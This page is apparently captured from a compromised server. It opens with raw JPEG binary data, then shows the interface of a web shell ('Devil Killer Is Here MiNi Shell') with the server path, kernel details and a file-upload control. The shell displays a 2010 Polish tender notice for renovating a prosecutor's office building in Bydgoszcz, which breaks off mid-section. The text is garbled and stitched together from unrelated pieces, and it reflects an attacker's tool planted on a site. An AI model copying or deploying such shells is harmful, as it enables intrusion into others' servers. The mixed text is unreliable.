JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100406/76431-N-2010.html

<p class="kh_header"><b>Bydgoszcz: Remont wraz z przebudową budynku biurowego Prokuratury Okręgowej w Bydgoszczy położonego przy ul. Stefana Okrzei 10.</b><br>
<b>Numer ogłoszenia: 76431 - 2010; data zamieszczenia: 06.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa w Bydgoszczy , ul. Farna 6, 85-101 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3477516.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bydgoszcz.po.gov.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont wraz z przebudową budynku biurowego Prokuratury Okręgowej w Bydgoszczy położonego przy ul. Stefana Okrzei 10..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Szczegółowy zakres prac przewidzianych do wykonania w ramach niniejszego zamówienia określony jest w dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót budowlanych stanowiących załączniki nr 2  do SIWZ. 
Zakres prac koniecznych do wykonania:
1.	Etap A.1 (wg przedmiaru Etap XXI) - prace przygotowawcze - wykonanie ogrodzenia wraz z zamontowaniem 2 bram i 2 furtek, wytyczenie parkingu tymczasowego przed budynkiem. - Wykonawca we własnym zakresie oszacuje ilość i wartość niezbędnych do wykonania prac oraz uzupełni o ten zakres prac kosztorys ofertowy ( pozycja Nr 377.). Uwzględnia tę pozycję w ostatecznej kalkulacji ceny.
2.	Etap A.2 (wg przedmiaru Etap XXI) - Utwardzenie i wykonanie tymczasowego parkingu przed budynkiem, z wjazdem od strony ul. Ks. Schulza - zgodnie z opisem:
- przemieszczenie spycharkami mas ziemnych na odległość do 30 m w gruncie kat. III m3 44,60
- Roboty ziemne wykop koparką przedsiębierną w ziemi kat.I-III uprzednio zmagazynowanej w hałdach z transportem urobku samochodami samowyładowczymi na odległość określoną przez wykonawcę - łącznie 44,60 m sześć.
- Mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni w gr.kat.I-IV - łącznie 223,00 m kw
- Ustawianie obrzeży betonowych o wym. 8x25 cm na podsypce cementowo - piaskowej z wypełnieniem spoin zaprawą cementową - 73,00 m
- Układanie nawierzchni tłuczniowej (kruszywo z wtórnego przerobu) - grubość warstwy 20 cm, łącznie - 223,00 m kw.
Wykonawca we własnym zakresie oszacuje ilość niezbędnych do wykonania prac oraz uzupełni o ten zakres prac kosztorys ofertowy ( również pozycja Nr 377). Uwzględnia tę pozycję w ostatecznej kalkulacji ceny.
3.	Etap A.3 (wg przedmiaru Etap XXVI) - przygotowanie 8 tymczasowych pomieszczeń zastępczych (odświeżenie ścian i wykładzin, przeniesienie) - Wykonawca we własnym zakresie oszacuje ilość i wartość niezbędnych do wykonania prac oraz uzupełni o ten zakres prac kosztorys ofertowy ( pozycja Nr 382). Uwzględnia tę pozycję w ostatecznej kalkulacji ceny.
4.	Etap B (wg przedmiaru Etap I) - roboty rozbiórkowe i konstrukcyjne oraz wejścia do budynku - w całości, z wyłączeniem dostawy i instalacji dźwigu osobowego - zgodnie z przedmiarem.
5.	Etap C (wg przedmiaru Etap od II do XX) - roboty wykończeniowe parteru - w całości oraz niezbędne branże: elektryczna, niskoprądowa wraz z instalacją węzłów pasywnych okablowania, wodno - kanalizacyjna, wentylacja, c.o. - zgodnie z przedmiarem.
6.	Etap D (wg przedmiaru Etap XXII) - roboty wykończeniowe piętra I - tylko w zakresie wykończenia głównej klatki schodowej, holu głównego, i przygotowania tymczasowego drugiego, pionowego ciągu komunikacyjnego wraz z udrożnieniem przejść w poziomym ciągu komunikacyjnym dla danej kondygnacji i zamontowaniem tymczasowych przegród wykonanych w systemie lekkiej zabudowy wraz z drzwiami pomiędzy częścią biurową i mieszkalną budynku - Wykonawca we własnym zakresie oszacuje ilość i wartość niezbędnych do wykonania prac oraz uzupełni o ten zakres prac kosztorys ofertowy ( pozycja Nr 378). Uwzględnia tę pozycję w ostatecznej kalkulacji ceny.
7.	Etap E (wg przedmiaru Etap XXIII) - roboty wykończeniowe piętra II - tylko w zakresie wykończenia głównej klatki schodowej i przygotowania tymczasowego drugiego, pionowego ciągu komunikacyjnego wraz z udrożnieniem przejść w poziomym ciągu komunikacyjnym dla danej kondygnacji i zamontowaniem tymczasowych przegród wykonanych w systemie lekkiej zabudowy wraz z drzwiami pomiędzy częścią biurową i mieszkalną budynku - Wykonawca we własnym zakresie oszacuje ilość i wartość niezbędnych do wykonania prac oraz uzupełni o ten zakres prac kosztorys ofertowy ( pozycja Nr 379). Uwzględnia tę pozycję w ostatecznej kalkulacji ceny.
8.	Etap F (wg przedmiaru Etap XXIV) - roboty wykończeniowe piętra III - tylko w zakresie wykończenia głównej klatki schodowej i przygotowania tymczasowego drugiego, pionowego ciągu komunikacyjnego wraz z udrożnieniem przejść w poziomym ciągu komunikacyjnym dla danej kondygnacji i zamontowaniem tymczasowych przegród wykonanych w systemie lekkiej zabudowy wraz z drzwiami pomiędzy częścią biurową i mieszkalną budynku - Wykonawca we własnym zakresie oszacuje ilość i wartość niezbędnych do wykonania prac oraz uzupełni o ten zakres prac kosztorys ofertowy ( pozycja Nr 380). Uwzględnia tę pozycję w ostatecznej kalkulacji ceny.
9.	Etap G (wg przedmiaru Etap XXV) roboty wykończeniowe piętra IV - tylko w zakresie wykończenia głównej klatki schodowej i przygotowania tymczasowego drugiego, pionowego ciągu komunikacyjnego wraz z udrożnieniem przejść w poziomym ciągu komunikacyjnym dla danej kondygnacji i zamontowaniem tymczasowych przegród wykonanych w systemie lekkiej zabudowy wraz z drzwiami pomiędzy częścią biurową i mieszkalną budynku - Wykonawca we własnym zakresie oszacuje ilość i wartość niezbędnych do wykonania prac oraz uzupełni o ten zakres prac kosztorys ofertowy ( pozycja Nr 381). Uwzględnia tę pozycję w ostatecznej kalkulacji ceny.
Istotne wymogi dodatkowe wynikające z konieczności użytkowania budynku w trakcie trwania remontu:
1.	Wykonawca dokona wytyczenia tymczasowego parkingu przed budynkiem, zgodnie z przekazanym szkicem sytuacyjnym załącznik nr 11 do SIWZ ) i dokona na własny koszt rekultywacji terenu przeznaczonego na parking poprzez usunięcie pozostałych po wycince pni drzew. 
2.	Wykonawca dokona ogrodzenia terenu budowy, zgodnie z przekazanym szkicem sytuacyjnym ( załącznik nr 10 do SIWZ ), elementami o łącznej długości wynikającej z granic geodezyjnych działek (ok. 120 m)  i o wysokości 1,7 m,  poprzez ustawienie ogrodzenia modułowego wokół działki nr 23/39 oraz części działki 17/1 i 17/2, wraz z zamontowaniem bramy przesuwnej, ręcznie sterowanej z zamknięciem i furtki uchylnej z zamknięciem od strony ul. Ks. Schulza. Bramy przesuwnej, ręcznie sterowanej z zamknięciem i furtki uchylnej z zamknięciem od strony ul. Okrzei. Ogrodzenie ma mieć charakter tymczasowy, bez podmurówki, lecz ma być trwale przytwierdzone do podłoża. Dodatkowo musi zostać zintegrowane (połączone) z istniejącym już ogrodzeniem parkingu, znajdującym się na zapleczu budynku oraz szlabanem odgradzającym wjazd na parking od strony ul. Księdza Schulza. Planowane ogrodzenie nie musi być realizowane w tym samym standardzie co istniejące. Najlepiej jeśli będzie wykonane z modułów na bazie prętów stalowych ocynkowanych lub powlekanych. Ogrodzenie ma być wykonane estetycznie. Po zakończeniu tej fazy remontu, Wykonawca pozostawia ogrodzenie do dalszego bezpłatnego użytkowania przez Inwestora. 
3.	Wykonawca realizuje przedmiot zamówienia poprzez wykonanie zgodnie z załączonym przedmiarem robót, Etap A.1, - ogrodzenie,  Etap A.2 - tymczasowy parking, Etap A.3 - przygotowanie pomieszczeń tymczasowych, Etap B - Roboty rozbiórkowe i konstrukcyjne oraz wejścia do budynku, Etap C - Roboty wykończeniowe parteru oraz pozostałe wyspecyfikowane roboty branżowe. Prace opisane w Etapie D - G w zakresie wykończenia głównej klatki schodowej na wyższych kondygnacjach, przygotowania tymczasowej alternatywnej klatki schodowej i udrożnienia ciągów komunikacyjnych na poszczególnych kondygnacjach. 
4.	Standard wykonania prac w zakresie przygotowania tymczasowej alternatywnej klatki schodowej i udrożnienia poziomych ciągów komunikacyjnych na poszczególnych kondygnacjach, ma być utrzymany na poziomie zapewniającym estetykę ciągów komunikacyjnych. 
5.	Prace będą wykonywane na użytkowanym obiekcie.
6.	Wykonawca jest zobowiązany do takiej organizacji prac remontowych, by w najmniejszym stopniu nie zakłócić pracy prokuratorów i urzędników wykonujących swoje ustawowe zadania w budynku przy ul. Okrzei 10 w Bydgoszczy. W tym celu wszelkie kolejne etapy prac muszą być z wyprzedzeniem uzgadniane z Inwestorem i w obecności inspektora nadzoru inwestorskiego. 
7.	W tym celu Wykonawca zobowiązany jest do szczelnego wydzielenia niebezpiecznych obszarów roboczych, tak by nie powodować przenikania zanieczyszczeń i hałasu do użytkowanej części budynku.
8.	Szczególnie ciężkie prace rozbiórkowe i konstrukcyjne muszą być prowadzone: w dni robocze w godzinach  popołudniowych (po godz. 15.30) lub w dni wolne od pracy.
9.	Jeżeli zakres realizowanych prac będzie wymagał przeniesienia użytkujących dane pomieszczenie osób, Wykonawca przygotowuje wcześniej wskazane przez Inwestora pomieszczenia zastępcze i poinformuje Inwestora z trzydniowym wyprzedzeniem ( 3 dni robocze) o konieczności przeniesienia użytkowników do tymczasowych pomieszczeń. Wykonawca na własny koszt przenosi wyposażenie biur do tymczasowych pomieszczeń z zachowaniem zasad bezpieczeństwa i nie uszkadzając sprzętu stanowiącego wyposażenie. Odbiór pomieszczeń tymczasowych wraz z przeniesionym sprzętem odbywa się protokolarnie. Osobą odpowiedzialną za realizację tego punku ze strony Inwestora będzie Pan Maciej Hełminiak, tel. 052 32 33 127.
10.	Wykonawca każdorazowo po zakończeniu prac w danym obszarze roboczym dokonuje uprzątnięcia wszelkich zbędnych przedmiotów, materiałów i narzędzi. Ostatecznie sprząta obszar. 
11.	Jeśli zakończenie prac w danym obszarze będzie związane z ostatecznym wykończeniem pomieszczeń lub ciągów komunikacyjnych oraz przekazaniem ich do użytkowania Inwestorowi, dodatkowo obszary te muszą być wyczyszczone, umyte i zakonserwowane zgodnie z wymogami technicznymi i niezbędnym ich estetycznym wyglądem. Odbiór i przywrócenie funkcjonalności tych obszarów odbędzie się po ocenie technicznej i podpisaniu protokołu.
12.	Jeśli wystąpią prace konieczne do wykonania w części użytkowanej bez możliwości wydzielenia odrębnego obszaru roboczego, Wykonawca z wyprzedzeniem 3 dni roboczych zaproponuje Inwestorowi, po uprzednim uzyskaniu akceptacji inspektora nadzoru inwestorskiego, sposób wykonania prac, z uwzględnieniem zabezpieczenia obszarów użytkowanych przed przypadkowym zniszczeniem, zabrudzeniem oraz hałasem. Dodatkowo obszary te, po zakończeniu prac muszą być wyczyszczone, umyte i zakonserwowane zgodnie z wymogami technicznymi i niezbędnym ich estetycznym wyglądem. Odbiór i przywrócenie funkcjonalności tych obszarów odbędzie się po ocenie technicznej i podpisaniu protokołu.
13.	Wykonawca może użyć materiałów pochodzących z wyburzeń do tymczasowego utwardzenia i wyrównania nawierzchni parkingu znajdującego się na zapleczu budynku przy ul. Okrzei 10. Materiał musi być odpowiednio rozdrobniony, by nie stanowił zagrożenia dla wjeżdżających na parking samochodów. Wykonawca wykona ten zakres prac na własny koszt po wcześniejszym uzgodnieniu tego z Inwestorem.
14.	Po zakończeniu tego etapu prac Wykonawca uporządkuje teren budowy oraz cały obszar wokół budynku. Uporządkowanie będzie polegało na usunięciu wszelkiego rodzaju maszyn, urządzeń narzędzi, odpadów i innych zanieczyszczeń. Dodatkowo wykonawca dokona wyrównania terenów zielonych przed budynkiem od strony ul. Ks. Schulza i nasadzi murawę.
15.	Wykonawca ma obowiązek każdorazowo, przed rozpoczęciem prac wymagających demontażu urządzeń niskoprądowych, zgłosić ten fakt inwestorowi, a za jego pośrednictwem uzgodnić szczegóły techniczne przeniesienia lub czasowego  demontażu urządzeń z gwarantem. Z ustaleń sporządzony zostanie protokół. 
16.	Inwestor zastrzega sobie prawo akceptacji wszelkich materiałów wykończeniowych wykorzystywanych przez Wykonawcę do realizacji prac remontowych. 
17.	 Zamawiający udostępnia oferentom, we wcześniej uzgodnionych terminach, budynek będący przedmiotem oferty w celu przeprowadzenia czynności niezbędnych do złożenia oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówień uzupełniających będą dodatkowe roboty budowlane zgodnie z art. 67 ust. 1 pkt.6 ustawy Prawo Zamówień Publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1, 45.22.33.00-9, 45.26.27.00-8, 45.30.00.00-0, 45.31.00.00-3, 45.33.00.00-9, 45.33.10.00-6, 45.33.11.00-7, 45.33.20.00-3, 45.34.20.00-6, 45.33.30.00-0, 45.40.00.00-1, 45.45.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępując do przetargu jest obowiązany wnieść wadium w wysokości 15.000,00 zł (słownie: piętnaście tysięcy złotych i 00/100 gr) przed upływem terminu składania ofert. Wadium może byś wnoszone w jednej lub kilku formach określonych szczegółowo w art. 45 ust. 6 ustawy Prawo zamówień publicznych. 
W przypadku wnoszenia wadium w pieniądzu, kwotę należy przekazać na konto Zamawiającego: NBP o/Bydgoszcz  Nr 83 1010 1078 0004 2013 9120 0000, z dopiskiem Wadium - remont wraz z przebudową budynku przy ul. Stefana Okrzei 10 - III G 231/3/10.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy uzna warunek za spełniony jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 Ustawy prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy uzna ten warunek za spełniony jeżeli Wykonawca dołączy do oferty wykaz wykonanych robót budowlanych polegających na remoncie pomieszczeń wewnątrz budynków użyteczności publicznej, o wartości prac: co najmniej 300 000,00 zł brutto w okresie ostatnich 5 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz  dokumenty potwierdzające, że roboty te zostały wykonane należycie (według wzoru stanowiącego Załącznik nr 5 do SIWZ). Treść dokumentu potwierdzającego należyte wykonanie robót musi pozwolić na przyporządkowanie mu odpowiedniej pozycji wykazu robót, której dany dokument dotyczy.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy uzna warunek za spełniony jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 Ustawy prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy uzna warunek za spełniony jeżeli Wykonawca dołączy do oferty wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności które pełnić będą nadzór nad kontrolą jakości lub które kierować będą robotami budowlanymi, wraz z informacjami na temat: ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami (według wzoru stanowiącego Załącznik nr 6 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy uzna warunek za spełniony jeżeli Wykonawca dołączy opłaconą polisę lub opłacony inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej przedmiotem zamówienia - działalność budowlana na kwotę co najmniej 300.000,00 zł. Jeżeli polisa nie zawiera adnotacji Ubezpieczyciela o opłaceniu należnej składki Wykonawca musi dołączyć do oferty dodatkowy dokument z którego będzie wynikać fakt uregulowania należności z tego tytułu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
